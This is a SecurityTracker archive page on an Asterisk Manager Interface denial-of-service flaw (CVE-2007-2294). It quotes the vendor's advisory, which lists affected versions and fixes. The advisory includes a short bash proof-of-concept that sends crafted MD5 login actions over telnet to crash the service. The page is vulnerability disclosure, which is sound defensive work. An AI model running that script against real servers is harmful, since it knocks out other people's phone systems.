SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (VoIP)  >   Asterisk Vendors:   Digium (Linux Support Services)
Asterisk Manager Interface NULL Pointer Dereference Lets Remote Users Deny Service
SecurityTracker Alert ID:  1017955
SecurityTracker URL:  http://securitytracker.com/id/1017955
CVE Reference:   CVE-2007-2294   (Links to External Site)
Updated:  May 12 2008
Original Entry Date:  Apr 25 2007
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): prior to 1.4.3
Description:   A vulnerability was reported in Asterisk in the Manager Interface. A remote user can cause denial of service conditions.

A remote user can send specially crafted data to cause the target Manager Interface to crash in certain situations. If a manager user account is configured in the 'manager.conf' file without a password and then a subsequent connection attempts to invoke that username and MD5 authentication, a NULL pointer dereference will occur and the service will crash.

The manager interface is not enabled by default.

Asterisk Business Edition, AsteriskNOW, and the Asterisk Appliance Developer Kit is affected.

The vendor was notified on April 24, 2007.

Digium Technical Support reported this vulnerability.

Impact:   A remote user can cause the Manager Interface to crash.
Solution:   The vendor has issued fixed versions (1.2.18 and 1.4.3), available at:

ftp://ftp.digium.com/pub/telephony/asterisk

The Asterisk advisory is available at:

http://www.asterisk.org/files/ASA-2007-012.pdf

Vendor URL:  www.asterisk.org/ (Links to External Site)
Cause:   State error
Underlying OS:   Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Date:  Tue, 24 Apr 2007 18:24:32 -0500
Subject:  [Full-disclosure] ASA-2007-012: Remote Crash Vulnerability in

>                Asterisk Project Security Advisory - ASA-2007-012
> 
>    +------------------------------------------------------------------------+
>    |       Product       | Asterisk                                         |
>    |---------------------+--------------------------------------------------|
>    |       Summary       | Remote Crash Vulnerability in Manager Interface  |
>    |---------------------+--------------------------------------------------|
>    | Nature of Advisory  | Denial of Service                                |
>    |---------------------+--------------------------------------------------|
>    |   Susceptibility    | Remote Unauthenticated Sessions                  |
>    |---------------------+--------------------------------------------------|
>    |      Severity       | Moderate                                         |
>    |---------------------+--------------------------------------------------|
>    |   Exploits Known    | Yes                                              |
>    |---------------------+--------------------------------------------------|
>    |     Reported On     | April 24, 2007                                   |
>    |---------------------+--------------------------------------------------|
>    |     Reported By     | Digium Technical Support                         |
>    |---------------------+--------------------------------------------------|
>    |      Posted On      | April 24, 2007                                   |
>    |---------------------+--------------------------------------------------|
>    |   Last Updated On   | April 24, 2007                                   |
>    |---------------------+--------------------------------------------------|
>    |  Advisory Contact   | russell@digium.com                               |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    | Description | The Asterisk Manager Interface has a remote crash        |
>    |             | vulnerability. If a manager user is configured in        |
>    |             | manager.conf without a password, and then a connection   |
>    |             | is made that attempts to use that username and MD5       |
>    |             | authentication, Asterisk will dereference a NULL pointer |
>    |             | and crash.                                               |
>    |             |                                                          |
>    |             | This example script shows how the crash can be           |
>    |             | triggered:                                               |
>    |             |                                                          |
>    |             | #!/bin/bash                                              |
>    |             |                                                          |
>    |             | function text1() {                                       |
>    |             |                                                          |
>    |             | cat <<- EOF                                              |
>    |             |                                                          |
>    |             | action: Challenge                                        |
>    |             |                                                          |
>    |             | actionid: 0#                                             |
>    |             |                                                          |
>    |             | authtype: MD5                                            |
>    |             |                                                          |
>    |             | EOF                                                      |
>    |             |                                                          |
>    |             | }                                                        |
>    |             |                                                          |
>    |             | function text2() {                                       |
>    |             |                                                          |
>    |             | cat <<- EOF                                              |
>    |             |                                                          |
>    |             | action: Login                                            |
>    |             |                                                          |
>    |             | actionid: 1#                                             |
>    |             |                                                          |
>    |             | key: textstringhere                                      |
>    |             |                                                          |
>    |             | username: testuser                                       |
>    |             |                                                          |
>    |             | authtype: MD5                                            |
>    |             |                                                          |
>    |             | EOF                                                      |
>    |             |                                                          |
>    |             | }                                                        |
>    |             |                                                          |
>    |             | (sleep 1; text1; sleep 1; text2 ) | telnet 127.0.0.1     |
>    |             | 5038                                                     |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    | Resolution | The manager interface is not enabled by default. If it is |
>    |            | enabled, the only way this crash can be exploited is if a |
>    |            | user exists in manager.conf without a password. Given the |
>    |            | conditions necessary for this problem to be exploited,    |
>    |            | the severity of this issue is marked as 'moderate'.       |
>    |            |                                                           |
>    |            | All users of the Asterisk manager interface in affected   |
>    |            | versions should ensure that there are no accounts in      |
>    |            | manager.conf. Alternatively, the issue can be avoided by  |
>    |            | completely disabling the manager interface.               |
>    |            |                                                           |
>    |            | Users of the manager interface are encouraged to update   |
>    |            | to the appropriate version of their Asterisk product      |
>    |            | listed in the 'Corrected In' section below.               |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    |                           Affected Versions                            |
>    |------------------------------------------------------------------------|
>    |           Product            |   Release   |                           |
>    |                              |   Series    |                           |
>    |------------------------------+-------------+---------------------------|
>    |     Asterisk Open Source     |    1.0.x    | All versions              |
>    |------------------------------+-------------+---------------------------|
>    |     Asterisk Open Source     |    1.2.x    | All versions prior to     |
>    |                              |             | 1.2.18                    |
>    |------------------------------+-------------+---------------------------|
>    |     Asterisk Open Source     |    1.4.x    | All versions prior to     |
>    |                              |             | 1.4.3                     |
>    |------------------------------+-------------+---------------------------|
>    |  Asterisk Business Edition   |    A.x.x    | All versions              |
>    |------------------------------+-------------+---------------------------|
>    |  Asterisk Business Edition   |    B.x.x    | All versions up to and    |
>    |                              |             | including B.1.3           |
>    |------------------------------+-------------+---------------------------|
>    |         AsteriskNOW          | pre-release | All version up to and     |
>    |                              |             | including Beta5           |
>    |------------------------------+-------------+---------------------------|
>    | Asterisk Appliance Developer |    0.x.x    | All versions prior to     |
>    |             Kit              |             | 0.4.0                     |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    |                              Corrected In                              |
>    |------------------------------------------------------------------------|
>    |      Product      |                      Release                       |
>    |-------------------+----------------------------------------------------|
>    |   Asterisk Open   |          1.2.18 and 1.4.3, available from          |
>    |      Source       |    ftp://ftp.digium.com/pub/telephony/asterisk     |
>    |-------------------+----------------------------------------------------|
>    | Asterisk Business |   B.1.3.3, available from the Asterisk Business    |
>    |      Edition      |  Edition user portal on http://www.digium.com or   |
>    |                   |            via Digium Technical Support            |
>    |-------------------+----------------------------------------------------|
>    |    AsteriskNOW    |             Beta6, when available from             |
>    |                   |   http://www.asterisknow.org/. Beta5 can use the   |
>    |                   |   system update feature in the appliance control   |
>    |                   |                       panel.                       |
>    |-------------------+----------------------------------------------------|
>    |     Asterisk      |               0.4.0, available from                |
>    |     Appliance     |      ftp://ftp.digium.com/pub/telephony/aadk/      |
>    |   Developer Kit   |                                                    |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    |        Links        |                                                  |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    | Asterisk Project Security Advisories are posted at                     |
>    | http://www.asterisk.org/security.                                      |
>    |                                                                        |
>    | This document may be superseded by later versions; if so, the latest   |
>    | version will be posted at                                              |
>    | http://www.asterisk.org/files/ASA-2007-012.pdf.                        |
>    +------------------------------------------------------------------------+
> 
>                Asterisk Project Security Advisory - ASA-2007-012
>               Copyright (c) 2007 Digium, Inc. All Rights Reserved.
>   Permission is hereby granted to distribute and publish this advisory in its
>                            original, unaltered form.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC